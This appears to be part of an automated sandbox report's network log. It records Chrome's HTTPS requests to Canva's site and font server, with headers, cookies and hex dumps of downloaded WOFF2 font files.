                                                                                                                                                                                                                                                    Set-Cookie: cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; Path=/; Expires=Fri, 19-Dec-25 21:27:32 GMT; Domain=.canva.com; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCCBvjBXytCO6OcnAVKmYtEDqUaKdaSWvjhSOBdQMTmTOsRej0bzpOcVUbpGVy8bi3ofTUtCc2zpUi3PQVgo4954x%2BAtsIFopFDVfyl%2BZkH97HbTdrKBKf%2BAV5vsXPM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f4a7a296a884339-EWR


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    50192.168.2.449799104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1312OUTGET /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1081INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:33 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a324e4b78d0-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                    x-request-id: 8f4a7a324e4b78d0
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wtrBfESVEFAq%2B65qJt%2FYKkNSSmQxg%2BzaZafd42Q1cdF4cyuk8%2FR99psrvgu7%2BTkEFT4vM%2FF8pfIC4sEcHWto21Ij2nm%2BektuMkK8V0GzRyavCzfXsBh2PVG30v6p%2Byo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC64INData Raw: 33 61 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 6e 6f 74 20 66 6f 75 6e 64 22 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 3a'"])}while(1);</x>//{"statusCode":404,"error":"not found"}
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    51192.168.2.449800104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC636OUTGET /YACgEZ1cb1Q/0/ArimoBoldItalic.08fb930e5cf38bab811efa91.1060345c54d396e76d73f1da7ee200bd.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:33 GMT
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Content-Length: 203232
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a33cee580dc-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1430105
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "fc158c702f95747bd895cec9ee6c5749"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:33 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 22 Dec 2020 02:11:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: Fqg4dqmggGhw/tfRnKKKxID6duGlPdXVNlTDAcLq8we+bmi/MEGGQEAqd7pwKS38wjsU4bSSPk0=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: 06HB64GZB3ZDEY1X
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: VG8jGiFhLNNCqazTPUkOY3SwineZkUQq
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC785INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 67 39 6b 74 4c 48 4a 6a 71 73 75 63 68 32 56 43 52 51 6a 56 74 51 44 46 33 65 54 77 61 78 54 5f 7a 6a 54 6a 35 58 39 44 73 49 6f 2d 31 37 33 34 36 34 33 36 35 33 2d 31 2e 30 2e 31 2e 31 2d 68 6a 6a 54 7a 43 31 73 7a 65 47 42 42 6b 52 65 68 72 38 6f 6f 4f 79 38 7a 65 41 35 37 5a 4d 5f 30 68 63 63 65 41 49 78 6f 75 63 63 52 42 6b 50 54 6f 48 4c 57 57 32 51 79 72 32 35 55 56 50 44 53 34 77 61 46 35 6c 7a 64 57 54 49 38 46 5a 5a 62 46 63 79 54 51 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 33 33 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=g9ktLHJjqsuch2VCRQjVtQDF3eTwaxT_zjTj5X9DsIo-1734643653-1.0.1.1-hjjTzC1szeGBBkRehr8ooOy8zeA57ZM_0hcceAIxouccRBkPToHLWW2Qyr25UVPDS4waF5lzdWTI8FZZbFcyTQ; path=/; expires=Thu, 19-Dec-24 21:57:33 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 03 19 e0 00 15 00 00 00 06 a3 54 00 03 19 6f 00 01 3b 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 6a 1b 82 9f 42 1c 96 4a 14 94 1c 06 60 16 a3 14 00 94 12 08 85 08 09 8f 34 11 0c ca 90 95 1c 12 83 e5 28 01 36 02 24 03 d0 5c 13 a6 4a cb d0 64 04 20 05 8d 19 07 81 cf 75 0c 88 30 5b e5 a1 b6 14 2a 43 b6 d9 ff b4 d7 52 ce 16 69 88 42 8e a3 80 6a 31 d1 c4 60 d7 88 66 fe 3b 28 75 62 b9 d1 1c 22 8b 31 f7 62 7c 1f c5 76 48 a9 7f 3f a4 57 f0 41 5a b7 76 a3 23 a8 1b 26 43 4b 95 7b 9b 47 f3 15 09 8a cb be bb a9 aa aa aa aa aa aa aa aa aa aa aa aa 6a 43 c9 7f 9e e8 f6 e7 dc b7 73 ee 7d 6f 66 86 5d d6 92 a5 15 8b 95 6d 09 7d 89 0a 51 bf fa aa 5f 19 72 8f 8c 02 91 94 5e b3 d8 59 90 95 d1 a0 46 db e5 a5 e5 7e 6d 0c 9a
                                                                                                                                                                                                                                                    Data Ascii: wOF2To;#jBJ`4(6$\Jd u0[*CRiBj1`f;(ub"1b|vH?WAZv#&CK{GjCs}of]m}Q_r^YF~m
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: ca 27 15 cb 63 44 74 c9 1b 84 c4 58 e4 df fe 79 de bf dd 73 df 7b ff 57 4a 68 c8 28 54 56 92 22 89 88 4a 24 42 c8 a7 42 ec ac 99 9d 26 49 2a 29 9a 1a 4b a5 25 a1 61 45 83 52 29 a5 48 45 69 fc 22 6d bc f3 8d ba ac 6a 68 f1 03 79 95 c9 69 93 fd fe d2 fd f9 cc f3 f3 6a 97 b8 70 dd 52 9b 5f a2 94 94 11 d7 1c c4 fa ff 1f dd 24 fd 64 75 bb 49 92 ac 64 a5 9b 6e 92 ac 8c b4 9d 4e 3b a7 d3 e9 74 fb c9 fc 79 ab 97 95 64 24 c9 4a 92 24 6b 25 49 92 ac 64 25 49 92 24 59 2b 49 92 ac 64 25 49 fa c9 4a 92 ac 64 25 2b fd bd d3 f2 e9 b1 29 8c f6 9c 70 08 e9 12 a7 00 5e 21 63 f1 81 d5 26 42 16 61 bf 40 80 94 57 e3 de b9 ea 6e 7a 5f e9 a6 b7 9b c2 45 ab 21 32 9d cd ec 6c b9 b2 77 5b ea 6d eb d7 9a 4e 92 65 eb 6c d9 1d 59 a7 b3 29 c2 d8 06 4c c0 94 9a 4a ab a1 15 63 4c 49 80
                                                                                                                                                                                                                                                    Data Ascii: 'cDtXys{WJh(TV"J$BB&I*)K%aER)HEi"mjhyijpR_$duIdnN;tyd$J$k%Id%I$Y+Id%IJd%+)p^!c&Ba@Wnz_E!2lw[mNelY)LJcLI
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: 64 d8 96 85 2c 81 83 20 6e 42 76 4f 73 ee db 83 87 8f 63 ee fe bb 69 02 66 58 05 d0 88 3a 7c 26 33 9f 3b f4 bf 61 44 99 ff ff 6b 1a aa 91 73 df 8f 4f 5c bb 7b e1 2d 90 ea a9 5a 56 04 7a 8c a8 51 31 3a 3a 4e ef f1 a8 00 a1 af e6 fa 63 34 36 b5 33 bd 2f 20 59 b8 d3 f8 d1 5d 85 00 38 d7 f1 2c 1b d3 86 13 f4 8f a4 f9 ff 36 f5 d3 62 f3 7f 7f e7 58 93 e0 14 63 61 2e d2 93 91 ad 07 16 ee 38 64 1c a6 94 b6 59 2c 86 00 3a 47 47 f2 35 2a 5f 8b b7 78 c1 f3 a9 69 ce b3 e5 0b 4b f0 06 61 50 7f 39 02 4d 1b 26 b4 fe 92 5c b4 bb 49 54 e7 a8 bb ab e9 ee 2a 55 aa 2a 55 a9 59 0b 7f 9a cf 57 4a db 3b b9 c4 46 30 d2 c0 a2 95 45 71 8b 71 5e 2d 71 70 8c a6 c5 4b 96 41 46 0c 56 92 b6 f7 3a 35 a7 7f 55 ea e5 30 e8 56 15 a6 22 07 51 38 3f 60 78 e8 c7 dc df 1e 2e c3 24 71 9d 92 09
                                                                                                                                                                                                                                                    Data Ascii: d, nBvOscifX:|&3;aDksO\{-ZVzQ1::Nc463/ Y]8,6bXca.8dY,:GG5*_xiKaP9M&\IT*U*UYWJ;F0Eqq^-qpKAFV:5U0V"Q8?`x.$q
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: a0 82 25 f0 ef 9f c9 78 e6 5b 55 76 56 76 9e 77 a4 1c da 9c 92 4f 49 39 a4 8d 83 ad b2 c2 40 03 5a 18 a6 ab 87 b6 e7 f6 ca 85 e2 22 17 06 b0 00 14 9c 82 ff ff f7 3c a6 49 69 47 f0 5b 89 66 0d 62 2f 3e 3c 3c cf ff cc 66 93 f4 dd 61 7d b2 38 9c 19 eb ba fc a8 a6 ee cf 39 d8 cd e2 10 1e 61 11 0e f8 6f b5 ef cb 73 83 d1 8d 42 27 41 92 14 c1 43 44 1a 29 44 a4 11 91 22 11 57 cd ac 67 f5 f9 fa bf 7e 59 df a7 84 ba 6f 49 43 07 91 d0 54 2f 48 68 32 5b 66 0b 22 22 85 04 11 11 29 0a 29 8a 42 c4 27 21 64 96 75 7d 99 e5 e7 73 68 bf e9 3e ba 37 53 5f 39 55 aa 54 a9 52 89 95 88 2c 22 b2 48 08 22 21 88 48 10 09 22 22 de ef 53 5f 75 fe 97 aa 15 de ef 6f da a0 e1 1a 2d 80 82 38 5c 2d 47 63 1d 8b cb e1 28 3a 9b de 45 2e 49 2e bf c8 b8 41 b6 f5 ff a6 4c e0 f2 65 b6 e7 55 6a
                                                                                                                                                                                                                                                    Data Ascii: %x[UvVvwOI9@Z"<IiG[fb/><<fa}89aosB'ACD)D"Wg~YoICT/Hh2[f""))B'!du}sh>7S_9UTR,"H"!H""S_uo-8\-Gc(:E.I.ALeUj
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: 97 28 cc 5f 94 18 ab 35 7c 8a 81 f7 ed 71 33 bb ff 8b f8 df c1 07 0c 74 c9 38 dc 21 b7 4d bf 19 26 4b 15 b3 d4 5b df 39 f6 08 39 76 b7 1c d3 4f a6 df ef f7 f3 f3 18 e4 fb 8d 63 2e c1 c8 42 87 01 f1 13 9e 05 23 66 b5 a8 56 a6 e7 a6 b2 d6 05 c9 a2 99 56 fa 19 66 82 49 a6 98 1e 1b 9b 83 20 0e 1a 89 21 f7 3b ca 34 2f fd 03 6f 68 7e fa 99 5b 2d 14 6f 2d a6 97 5e fb af e5 8c 0a f8 54 51 4b 3d 0d b4 31 c8 10 23 8c b1 84 88 f5 b1 bd 39 00 10 50 e0 20 40 22 39 a4 5a 5b 6b 2c 3e d9 98 6e f5 5b 95 5d 59 aa 2d 11 ca a9 80 4f 15 b5 d4 d3 40 1b 83 0c 31 c2 18 4b 88 58 1f db 9b 03 00 01 05 0e 02 24 92 43 ea 4b 44 c7 c7 cf 4b 3d 1e fc 9f e5 ee 9f f7 71 65 65 d4 4f f0 66 9d 79 c4 a1 cd da 39 c4 5c fb f1 88 67 87 f1 88 73 27 e0 46 61 13 9b 9f 30 92 1b e6 09 53 2d 08 6e 9d
                                                                                                                                                                                                                                                    Data Ascii: (_5|q3t8!M&K[99vOc.B#fVVfI !;4/oh~[-o-^TQK=1#9P @"9Z[k,>n[]Y-O@1KX$CKDK=qeeOfy9\gs'Fa0S-n
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: de 93 8e f7 f0 cb 84 81 08 34 62 76 ea 56 6e d3 ca 73 41 ff b7 7a ee 81 ff f5 ce b7 fc 7f 59 39 3b 3a 4f 49 cb b8 f3 86 b7 bb 8a 46 91 79 ff 51 f0 a5 bb ef c2 6d 2c ca d7 73 ed 6c b0 9f db b1 b5 58 b7 20 e3 09 f6 96 fd 1d 8e e3 be de 59 c4 e1 96 41 3e 72 87 5b 16 3b 57 95 f5 0e 6b a0 91 ef 10 9f 25 cb 5e 89 b4 35 9a 4c f7 ce 43 40 47 b3 9c 6e ca 3c 19 56 db 81 e1 60 c7 61 65 d0 ee f2 12 9e 38 f8 92 e1 b0 e4 72 c7 c1 27 0d 5b 71 40 c3 41 13 c6 b0 5f e0 84 89 b5 65 c3 d6 bb cb 99 dc 91 63 62 cd 2b b8 9c a5 f9 0f 91 68 51 c1 68 59 4a 61 b5 32 8b 0f 8b 14 7e 6d 49 11 d0 81 93 04 75 f8 be f2 dd af c5 21 16 74 27 19 ba ac 7b c8 44 ac 12 10 79 28 34 36 aa 5b da 45 d6 78 31 b2 1d cc c1 c8 d1 12 d7 a7 65 d1 84 c0 88 79 0f b6 33 44 26 64 62 26 9f 52 02 f5 1a 74 46
                                                                                                                                                                                                                                                    Data Ascii: 4bvVnsAzY9;:OIFyQm,slX YA>r[;Wk%^5LC@Gn<V`ae8r'[q@A_ecb+hQhYJa2~mIu!t'{Dy(46[Ex1ey3D&db&RtF
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: 51 a2 2d 15 e5 6d d8 aa 65 1f 06 38 a9 81 9d 30 33 56 88 88 d6 6d d4 bc 52 ca b6 d3 78 db 59 04 a8 bb 7c eb 41 be 8d 7c be 59 b7 d4 1b 82 83 e1 28 45 e7 1d 95 b6 a9 1c 1c 7d 62 bb 9c 08 76 f8 4a d8 61 8b 87 06 5e a8 26 c1 c2 69 16 ea ce 3b cd 36 af db 2f 54 75 f5 c1 44 07 8c 62 8b 54 dc 23 a0 d0 36 2d 87 87 ce 86 cf 10 52 05 38 6b 19 35 6a d4 4e 37 f8 80 d3 0d 59 76 77 7f 0b e0 ed 26 0c 72 86 02 8b 13 e1 c3 81 fd 2d 1d a3 ae eb 81 03 22 83 c5 0b ab d2 88 c4 61 03 93 f4 38 e4 d5 35 57 a6 e3 f4 54 81 33 3c de 7e 0b 94 3a 07 c6 9c 81 46 0f 7b f1 7a 83 5d 14 d6 0d ea 30 34 4d 5b ed 43 cd 36 1f 0c b0 07 15 ae 64 70 3e 07 47 2f 75 ef b8 b3 72 74 d7 48 52 50 96 e4 84 9d 46 53 54 4a 02 3b fd 60 27 b0 3e 30 3c 9b de 6e 01 76 2e 13 74 6d 1a b6 56 29 ae b5 2c ae 4a
                                                                                                                                                                                                                                                    Data Ascii: Q-me803VmRxY|A|Y(E}bvJa^&i;6/TuDbT#6-R8k5jN7Yvw&r-"a85WT3<~:F{z]04M[C6dp>G/urtHRPFSTJ;`'>0<nv.tmV),J
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: fb 3f ec ef fa e1 a2 bd d0 56 79 46 0f c2 0f 75 1f 7b fc 87 39 88 30 22 31 cc 96 fa 22 92 c8 2c 3a dd f7 ba 2c 7a 4c e4 83 0f 45 b7 3a 15 05 e3 33 51 c6 20 27 6b 25 49 d6 31 d6 2d a3 ba 0a 72 69 46 12 0b 56 04 9d 76 23 9d 55 69 c6 ea 32 2a 52 40 ce 69 99 a0 eb 0d 62 66 a2 26 a5 51 ad a4 bd 26 29 19 ae 53 20 64 a6 da ac ca d6 e8 93 1e ee 8f 1a 53 1c d2 60 8e 2d ed d8 81 85 b4 d0 82 fb a0 0c 8f 37 06 c0 c5 1f ce c2 f4 84 d4 50 75 18 ec 1b b1 57 d9 8b f9 e1 5b 16 4b ac a9 ff b1 59 5b 0a ef 36 8e 5d ea fe 45 f3 63 ba 07 f2 d3 fa ea 2f 15 7f c0 de 9f b8 08 71 1a 52 ad 43 a3 58 74 5b b0 d5 a6 d7 09 7b 36 8d 0c 86 2a 55 47 42 67 77 ff da b4 3e fd c1 14 2b e7 aa 9a d7 8e 9a fe a1 d8 d8 26 9d 51 a9 9f e4 19 6e e1 e2 6c 10 7d b4 99 44 5a 69 75 5d 9b 1d 24 43 6e f8
                                                                                                                                                                                                                                                    Data Ascii: ?VyFu{90"1",:,zLE:3Q 'k%I1-riFVv#Ui2*R@ibf&Q&)S dS`-7PuW[KY[6]Ec/qRCXt[{6*UGBgw>+&Qnl}DZiu]$Cn
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: f3 df fa 7c a5 de 76 4e 90 87 e6 11 cb f6 5e 32 90 ce b3 de 0c bd bd 49 0e de 71 b1 ba 2c 0d 66 09 2c 15 7e cf 98 2a d2 52 89 9a cf 07 06 db f5 9a 45 56 5e a4 be d9 8d 8b c2 3b b9 8f a2 5b da a7 2f b0 73 73 5f 9c ab c1 df 07 36 e9 79 78 5f da cb 16 81 b1 fc 2f ff 0c 38 f8 55 bf a4 b7 bd e7 e5 3a a5 35 2b 0c 67 36 d0 73 3e 93 7a a1 cf b3 ad 16 64 a6 da 24 3a b0 b8 1a fc 88 b8 39 c3 67 d2 0a 06 ca 02 33 85 7a f8 5a 1a db 57 3c d7 3c cc 96 de f6 4d e9 43 b0 44 48 db 59 ea 94 a5 e0 18 04 5b a6 b6 87 c9 93 0f 20 db fd 1d d9 cb 1b dc 59 8d 0e bc d2 3e 6c 8c 87 15 eb f1 a9 4d 4b 1c b3 9b 82 14 f8 77 42 37 da 09 4c a0 e9 f9 60 85 de f4 51 db c9 aa ed b9 08 be 2f a3 34 87 21 f3 0b e6 0e 9c 97 9e a4 6f a1 ec 08 b3 d7 bc 41 ff 5d 84 fd fd 40 5a 63 f6 37 eb c3 ea ec
                                                                                                                                                                                                                                                    Data Ascii: |vN^2Iq,f,~*REV^;[/ss_6yx_/8U:5+g6s>zd$:9g3zZW<<MCDHY[ Y>lMKwB7L`Q/4!oA]@Zc7


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    52192.168.2.449801104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC636OUTGET /YACgEZ1cb1Q/0/ArimoItalic.fa87472a877e70c5bce22e42be5c.d257a7100844bc3f98c9021168b6249e.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:33 GMT
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Content-Length: 201132
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a342a170f5b-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1343496
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "1da7b78b095470252a023e5943d6bfee"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:33 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 22 Dec 2020 02:11:02 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
